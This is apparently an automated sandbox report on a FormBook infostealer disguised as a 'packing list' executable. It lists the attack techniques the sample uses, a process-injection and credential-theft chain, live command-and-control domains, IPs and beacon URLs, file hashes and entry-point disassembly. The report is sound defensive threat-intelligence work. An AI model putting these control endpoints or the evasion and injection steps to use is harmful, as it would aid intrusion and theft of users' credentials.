                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562306 Sample: packing list G25469.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 28 www.reglagrisi.xyz 2->28 30 www.zripidro-priek.sbs 2->30 32 6 other IPs or domains 2->32 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected FormBook 2->44 46 Binary is likely a compiled AutoIt script file 2->46 50 3 other signatures 2->50 10 packing list G25469.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 RUaXGIhjtGYK.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 sort.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 RUaXGIhjtGYK.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.cognetix.website 209.74.64.59, 49912, 49919, 49925 MULTIBAND-NEWHOPEUS United States 22->34 36 www.zripidro-priek.sbs 104.21.49.253, 49947, 49956, 49964 CLOUDFLARENETUS United States 22->36 38 2 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                packing list G25469.exe76%ReversingLabsWin32.Trojan.AutoitInject
                packing list G25469.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.reglagrisi.xyz/0zz8/0%Avira URL Cloudsafe
                http://www.pemedee.shop/34mw/?66yHIJy0=lV2cRmnx0FXilEhPfZpPq92dnG52j/QoqXjGTFXGCyRw3OEGJ+HF1fmQ5H3Wo7ce76AoiMuOhG4wkWS+FEimc0ozfubLJga7WYw3/1RzG4ZgP834S4sDnL3IAG89uzHPig==&kb0=y00p-fqpV0lDx0%Avira URL Cloudsafe
                http://www.doodmuhendislik.online/gvzn/?66yHIJy0=o7KupOcAdWG3nNYrbq63Y8DzVnVB0qlwhMl7Hzztm2YkQ+XZ5fWrExX6f74/Q+gqqRwMkXMPRKrB5xjKrizfc0njWqGlsy1S02QFwmKvno45o6r8NJKsDvPhV7F8JiCX6A==&kb0=y00p-fqpV0lDx0%Avira URL Cloudsafe
                http://www.zripidro-priek.sbs/z4gi/?66yHIJy0=tobef8QUjNtUGsCsZYmGO1WvWH56aIAOgrSm2aMJLZ6iUqk1KnrnzENErAzxTvM0Kt9VGCxiYM8pqeYnhdhOa5dKpcotDhPK6/abxg2wjtQ4wVR0RbZFA0B3ye13cpOI8A==&kb0=y00p-fqpV0lDx0%Avira URL Cloudsafe
                http://www.reglagrisi.xyz/0zz8/?66yHIJy0=7cEP14LQRsmKYf0RxKlrVIQIxmtU9D+RldOl4BCMwEJUAVNxY1goksq2QoLfI57UCvTcV6taODognwi8704pJ4gcp3yiRXYMqiAP6sz3W4747Aq9y3ZRdxST32LjlURtCA==&kb0=y00p-fqpV0lDx0%Avira URL Cloudsafe
                http://www.doodmuhendislik.online/gvzn/0%Avira URL Cloudsafe
                http://www.zripidro-priek.sbs/z4gi/0%Avira URL Cloudsafe
                http://www.cognetix.website/qttd/?66yHIJy0=ZvCBpOBACo8OAP3s1LOntf8DB/mM6FnXsWNgstfKSYdbGQSfJ8wq0qnRN0l90UAeuSPeR5WzZqkUYpE1Yg3SfGIW8QzsnQZV+EE7c+vVMu1pn444qRf10NViSNzmoeqFEg==&kb0=y00p-fqpV0lDx0%Avira URL Cloudsafe
                http://www.cognetix.website/qttd/0%Avira URL Cloudsafe
                http://www.zripidro-priek.sbs0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.zripidro-priek.sbs
                104.21.49.253
                truefalse
                  unknown
                  www.cognetix.website
                  209.74.64.59
                  truefalse
                    unknown
                    pemedee.shop
                    3.33.130.190
                    truefalse
                      unknown
                      natroredirect.natrocdn.com
                      85.159.66.93
                      truefalse
                        high
                        www.reglagrisi.xyz
                        unknown
                        unknowntrue
                          unknown
                          www.pemedee.shop
                          unknown
                          unknownfalse
                            unknown
                            www.doodmuhendislik.online
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              http://www.reglagrisi.xyz/0zz8/false
                              • Avira URL Cloud: safe
                              unknown
                              http://www.pemedee.shop/34mw/?66yHIJy0=lV2cRmnx0FXilEhPfZpPq92dnG52j/QoqXjGTFXGCyRw3OEGJ+HF1fmQ5H3Wo7ce76AoiMuOhG4wkWS+FEimc0ozfubLJga7WYw3/1RzG4ZgP834S4sDnL3IAG89uzHPig==&kb0=y00p-fqpV0lDxfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.reglagrisi.xyz/0zz8/?66yHIJy0=7cEP14LQRsmKYf0RxKlrVIQIxmtU9D+RldOl4BCMwEJUAVNxY1goksq2QoLfI57UCvTcV6taODognwi8704pJ4gcp3yiRXYMqiAP6sz3W4747Aq9y3ZRdxST32LjlURtCA==&kb0=y00p-fqpV0lDxfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.zripidro-priek.sbs/z4gi/?66yHIJy0=tobef8QUjNtUGsCsZYmGO1WvWH56aIAOgrSm2aMJLZ6iUqk1KnrnzENErAzxTvM0Kt9VGCxiYM8pqeYnhdhOa5dKpcotDhPK6/abxg2wjtQ4wVR0RbZFA0B3ye13cpOI8A==&kb0=y00p-fqpV0lDxfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.cognetix.website/qttd/false
                              • Avira URL Cloud: safe
                              unknown
                              http://www.cognetix.website/qttd/?66yHIJy0=ZvCBpOBACo8OAP3s1LOntf8DB/mM6FnXsWNgstfKSYdbGQSfJ8wq0qnRN0l90UAeuSPeR5WzZqkUYpE1Yg3SfGIW8QzsnQZV+EE7c+vVMu1pn444qRf10NViSNzmoeqFEg==&kb0=y00p-fqpV0lDxfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.doodmuhendislik.online/gvzn/false
                              • Avira URL Cloud: safe
                              unknown
                              http://www.zripidro-priek.sbs/z4gi/false
                              • Avira URL Cloud: safe
                              unknown
                              http://www.doodmuhendislik.online/gvzn/?66yHIJy0=o7KupOcAdWG3nNYrbq63Y8DzVnVB0qlwhMl7Hzztm2YkQ+XZ5fWrExX6f74/Q+gqqRwMkXMPRKrB5xjKrizfc0njWqGlsy1S02QFwmKvno45o6r8NJKsDvPhV7F8JiCX6A==&kb0=y00p-fqpV0lDxfalse
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/chrome_newtabsort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icosort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://www.zripidro-priek.sbsRUaXGIhjtGYK.exe, 00000007.00000002.3344117525.0000000005429000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.ecosia.org/newtab/sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sort.exe, 00000005.00000003.2720283100.00000000074E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                209.74.64.59
                                                www.cognetix.websiteUnited States
                                                31744MULTIBAND-NEWHOPEUSfalse
                                                104.21.49.253
                                                www.zripidro-priek.sbsUnited States
                                                13335CLOUDFLARENETUSfalse
                                                3.33.130.190
                                                pemedee.shopUnited States
                                                8987AMAZONEXPANSIONGBfalse
                                                85.159.66.93
                                                natroredirect.natrocdn.comTurkey
                                                34619CIZGITRfalse
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1562306
                                                Start date and time:2024-11-25 13:43:15 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 2s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:7
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:packing list G25469.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@6/4
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 92%
                                                • Number of executed functions: 52
                                                • Number of non-executed functions: 294
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • VT rate limit hit for: packing list G25469.exe
                                                TimeTypeDescription
                                                07:45:30API Interceptor994080x Sleep call for process: sort.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                209.74.64.59DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                • www.photonvault.live/ts8k/
                                                rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                • www.mindshifty.top/mgna/
                                                Selected_Items.vbsGet hashmaliciousFormBookBrowse
                                                • www.orbitfusion.life/tvrm/
                                                RFQ.docxGet hashmaliciousFormBookBrowse
                                                • www.swiftbyrte.xyz/4nss/
                                                3.33.130.190santi.exeGet hashmaliciousFormBookBrowse
                                                • www.espiritismo.info/4knb/
                                                TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                • www.platinumkitchens.info/x3qa/
                                                Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                • www.goldstarfootwear.shop/8m07/
                                                Payroll List.exeGet hashmaliciousFormBookBrowse
                                                • www.mcfunding.org/0598/
                                                NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbeGet hashmaliciousFormBookBrowse
                                                • www.qwibie.net/83g2/
                                                HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                • www.micrhyms.info/y7on/
                                                MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                • www.mcfunding.org/0598/?1H=t68BN09iVeqb/IuMYFog8KGcDQiER6CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4dOWWiTyMXvF8kyx1KEOeQXc/yVhXxnErc2M=&jD=VzTtTZ
                                                Order No 24.exeGet hashmaliciousFormBookBrowse
                                                • www.marketprediction.app/ucmb/
                                                PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                • www.livelovechat.live/pd34/
                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                • www.theproselytizer.net/zyfi/
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                natroredirect.natrocdn.compurchase Order.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                NEW PURCHASE ORDER DRAWINGSSPECS 5655-2024.vbeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                need quotations.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                • 85.159.66.93
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                MULTIBAND-NEWHOPEUSIETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • 209.74.77.108
                                                PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.109
                                                file.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.109
                                                VSP469620.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.108
                                                CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.108
                                                Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.107
                                                PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.109
                                                Quotation.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.109
                                                payments.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.109
                                                Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                • 209.74.77.108
                                                AMAZONEXPANSIONGBhttp://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                • 3.33.220.150
                                                https://clever-photos-686127.framer.app/Get hashmaliciousUnknownBrowse
                                                • 52.223.52.2
                                                santi.exeGet hashmaliciousFormBookBrowse
                                                • 3.33.130.190
                                                TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                                                • 3.33.130.190
                                                Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                • 3.33.130.190
                                                setup (1).msiGet hashmaliciousAteraAgentBrowse
                                                • 52.223.39.232
                                                Payroll List.exeGet hashmaliciousFormBookBrowse
                                                • 3.33.130.190
                                                http://www.tqltrax.comGet hashmaliciousUnknownBrowse
                                                • 3.33.148.61
                                                https://rebrand.ly/gs02u8aGet hashmaliciousUnknownBrowse
                                                • 3.33.143.57
                                                https://ambir.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                • 3.33.220.150
                                                CLOUDFLARENETUS#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 104.21.67.152
                                                PO_203-25.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 172.67.200.96
                                                F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                • 172.67.177.134
                                                https://go.jrwcap.com/e/955053/230645595232154/6xyvj/710994189/h/-dwcgo8Jrn520ILsDDgocWZSKLzmmTijUb6c_giV2KAGet hashmaliciousPhisherBrowse
                                                • 104.22.72.81
                                                dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • 172.67.177.134
                                                AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                • 104.21.67.152
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 104.21.88.250
                                                Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                • 172.67.206.110
                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                • 104.21.88.250
                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                • 172.67.155.47
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\packing list G25469.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287744
                                                Entropy (8bit):7.993937812625558
                                                Encrypted:true
                                                SSDEEP:6144:+DSd5YFUgzXHr9M+7T1ImOnN3BWDrrKB8aI/1IJNwpGIAnSP4:+5dhbZImNaa2JNwpw+4
                                                MD5:22A0F3E3DF8883D3B1006228AD30EB77
                                                SHA1:CA6FAAC9B760808FE0DFE49D0D8A370DF2E60F80
                                                SHA-256:1D15AC13E5BCD60810B56F733396A986764EA9BE5844D3D92D2BDBB664F98767
                                                SHA-512:21A86D69AF84CB6A007E9A49F452B913F04A21203A5E073B4C674C2385FDDE0B992E2F3705464D89B0CD6ECC6FFC110E3B1462D9BFE1200194156D36D85C1E30
                                                Malicious:false
                                                Reputation:low
                                                Preview:..vj.L3NW...?..z.8W....B>...EIQF38TL3NWA696QEIQF38TL3NWA69.QEI_Y.6T.:.v.7u.p.!85.H&#T<6,.ZW?+&%fQ]t>F w(X.r..i<)W]zA>DsA696QEI(G:.i,T.j!Q..1".K...n,T.M...1".K...h,T..(UQ.1".QF38TL3N..69zPDI'X.YTL3NWA69.QGHZG88T.7NWA696QEI.U38T\3NW1296Q.IQV38TN3NQA696QEIWF38TL3NW1296SEIQF38VLs.WA&96AEIQF#8T\3NWA69&QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEI.2V@ L3N..296AEIQ.78T\3NWA696QEIQF38tL3.WA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3N
                                                Process:C:\Users\user\Desktop\packing list G25469.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287744
                                                Entropy (8bit):7.993937812625558
                                                Encrypted:true
                                                SSDEEP:6144:+DSd5YFUgzXHr9M+7T1ImOnN3BWDrrKB8aI/1IJNwpGIAnSP4:+5dhbZImNaa2JNwpw+4
                                                MD5:22A0F3E3DF8883D3B1006228AD30EB77
                                                SHA1:CA6FAAC9B760808FE0DFE49D0D8A370DF2E60F80
                                                SHA-256:1D15AC13E5BCD60810B56F733396A986764EA9BE5844D3D92D2BDBB664F98767
                                                SHA-512:21A86D69AF84CB6A007E9A49F452B913F04A21203A5E073B4C674C2385FDDE0B992E2F3705464D89B0CD6ECC6FFC110E3B1462D9BFE1200194156D36D85C1E30
                                                Malicious:false
                                                Reputation:low
                                                Preview:..vj.L3NW...?..z.8W....B>...EIQF38TL3NWA696QEIQF38TL3NWA69.QEI_Y.6T.:.v.7u.p.!85.H&#T<6,.ZW?+&%fQ]t>F w(X.r..i<)W]zA>DsA696QEI(G:.i,T.j!Q..1".K...n,T.M...1".K...h,T..(UQ.1".QF38TL3N..69zPDI'X.YTL3NWA69.QGHZG88T.7NWA696QEI.U38T\3NW1296Q.IQV38TN3NQA696QEIWF38TL3NW1296SEIQF38VLs.WA&96AEIQF#8T\3NWA69&QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEI.2V@ L3N..296AEIQ.78T\3NWA696QEIQF38tL3.WA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3NWA696QEIQF38TL3N
                                                Process:C:\Windows\SysWOW64\sort.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                Category:dropped
                                                Size (bytes):196608
                                                Entropy (8bit):1.121297215059106
                                                Encrypted:false
                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.153555610434171
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:packing list G25469.exe
                                                File size:1'220'096 bytes
                                                MD5:22063492b30a1ba8f06c735399a8edc2
                                                SHA1:deedf469eeed1d7c2a198afd74cccc6455c4cc65
                                                SHA256:6ee23e911640ca040e86f71845a05995289b32fa80fa487a1d125357c8da99de
                                                SHA512:a3eda23cc9e7dc3b05905aaad77aa089536e75e36ed7bbce9801e4119412b2f7955433acf4c9626825c181e7913f81c9a8359eef3424ea93b592558fb279248f
                                                SSDEEP:24576:htb20pkaCqT5TBWgNQ7aqBOZc/ac5fCFrQm6A:yVg5tQ7aqofctO5
                                                TLSH:8C45CF1363DD8361C3B25273BA25BB01AEBF7C2506A5F56B2FD4093DF920122525EA73
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                Icon Hash:aaf3e3e3938382a0
                                                Entrypoint:0x425f74
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x673C7A54 [Tue Nov 19 11:45:24 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                Instruction
                                                call 00007F27808393DFh
                                                jmp 00007F278082C3F4h
                                                int3
                                                int3
                                                push edi
                                                push esi
                                                mov esi, dword ptr [esp+10h]
                                                mov ecx, dword ptr [esp+14h]
                                                mov edi, dword ptr [esp+0Ch]
                                                mov eax, ecx
                                                mov edx, ecx
                                                add eax, esi
                                                cmp edi, esi
                                                jbe 00007F278082C57Ah
                                                cmp edi, eax
                                                jc 00007F278082C8DEh
                                                bt dword ptr [004C0158h], 01h
                                                jnc 00007F278082C579h
                                                rep movsb
                                                jmp 00007F278082C88Ch
                                                cmp ecx, 00000080h
                                                jc 00007F278082C744h
                                                mov eax, edi
                                                xor eax, esi
                                                test eax, 0000000Fh
                                                jne 00007F278082C580h
                                                bt dword ptr [004BA370h], 01h
                                                jc 00007F278082CA50h
                                                bt dword ptr [004C0158h], 00000000h
                                                jnc 00007F278082C71Dh
                                                test edi, 00000003h
                                                jne 00007F278082C72Eh
                                                test esi, 00000003h
                                                jne 00007F278082C70Dh
                                                bt edi, 02h
                                                jnc 00007F278082C57Fh
                                                mov eax, dword ptr [esi]
                                                sub ecx, 04h
                                                lea esi, dword ptr [esi+04h]
                                                mov dword ptr [edi], eax
                                                lea edi, dword ptr [edi+04h]
                                                bt edi, 03h
                                                jnc 00007F278082C583h
                                                movq xmm1, qword ptr [esi]
                                                sub ecx, 08h
                                                lea esi, dword ptr [esi+08h]
                                                movq qword ptr [edi], xmm1
                                                lea edi, dword ptr [edi+08h]
                                                test esi, 00000007h
                                                je 00007F278082C5D5h
                                                bt esi, 03h
                                                jnc 00007F278082C628h
                                                movdqa xmm1, dqword ptr [esi+00h]
                                                Programming Language:
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                • [ASM] VS2012 UPD4 build 61030
                                                • [RES] VS2012 UPD4 build 61030
                                                • [LNK] VS2012 UPD4 build 61030
